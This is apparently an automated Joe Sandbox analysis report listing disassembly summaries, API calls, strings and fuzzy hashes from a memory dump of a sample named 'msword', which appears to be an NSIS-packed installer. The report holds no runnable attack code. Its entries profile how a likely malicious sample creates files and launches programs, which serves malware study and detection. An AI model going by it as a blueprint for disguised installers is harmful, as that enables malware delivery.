Memory Dump Source: same dump and associated regions as listed above (00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true)
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                        • API String ID: 2872004960-3619442763
                                                                                        • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                        • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                        • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                        • API String ID: 608394941-1650083594
                                                                                        • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                        • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • lstrcatW.KERNEL32(00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,WarsFeltMadridFarmsPee,WarsFeltMadridFarmsPee,00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$WarsFeltMadridFarmsPee
                                                                                        • API String ID: 4286501637-4051260161
                                                                                        • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                        • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00403598
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                        Strings
                                                                                        • Inst, xrefs: 0040366C
                                                                                        • Null, xrefs: 0040367E
                                                                                         • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 004037C5
                                                                                        • Error launching installer, xrefs: 004035D7
                                                                                        • soft, xrefs: 00403675
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                         • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                                                        • API String ID: 4283519449-527102705
                                                                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 004033E7
                                                                                        • GetTickCount.KERNEL32 ref: 00403464
                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                        • wsprintfW.USER32 ref: 004034A4
                                                                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: CountFileTickWrite$wsprintf
• String ID: ... %d%%$P1B$X1C$X1C
• API String ID: 651206458-1535804072

Control-flow Graph
APIs
• lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
• lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
• lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
• SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
• SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
• String ID:
• API String ID: 2740478559-0

Control-flow Graph
APIs
  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
• GlobalFree.KERNELBASE(007ED550), ref: 00402387
Strings
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: FreeGloballstrcpyn
• String ID: Exch: stack < %d elements$Pop: stack empty$WarsFeltMadridFarmsPee
• API String ID: 1459762280-1231270740

Control-flow Graph
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
• GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
• VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
• GlobalFree.KERNELBASE(007ED550), ref: 00402387
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
• String ID:
• API String ID: 3376005127-0

Control-flow Graph
APIs
• GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
• WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
• lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
• WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
• String ID:
• API String ID: 2568930968-0

Control-flow Graph
APIs
  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
• WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
Strings
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: PrivateProfileStringWritelstrcpyn
• String ID: <RM>$WarsFeltMadridFarmsPee$WriteINIStr: wrote [%s] %s=%s in %s
• API String ID: 247603264-1220653561
APIs
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Strings
• ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
• ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
• String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
• API String ID: 3156913733-2180253247
• Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
• Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
• Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
• Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
APIs
• GetTickCount.KERNEL32 ref: 00405E9D
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
Strings
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
• Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
• Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
• Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Strings
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: Window$EnableShowlstrlenwvsprintf
• String ID: HideWindow
• API String ID: 1249568736-780306582
• Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
• Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
• Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
• Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
• Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
• Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
• Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
• Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
• Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
• Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
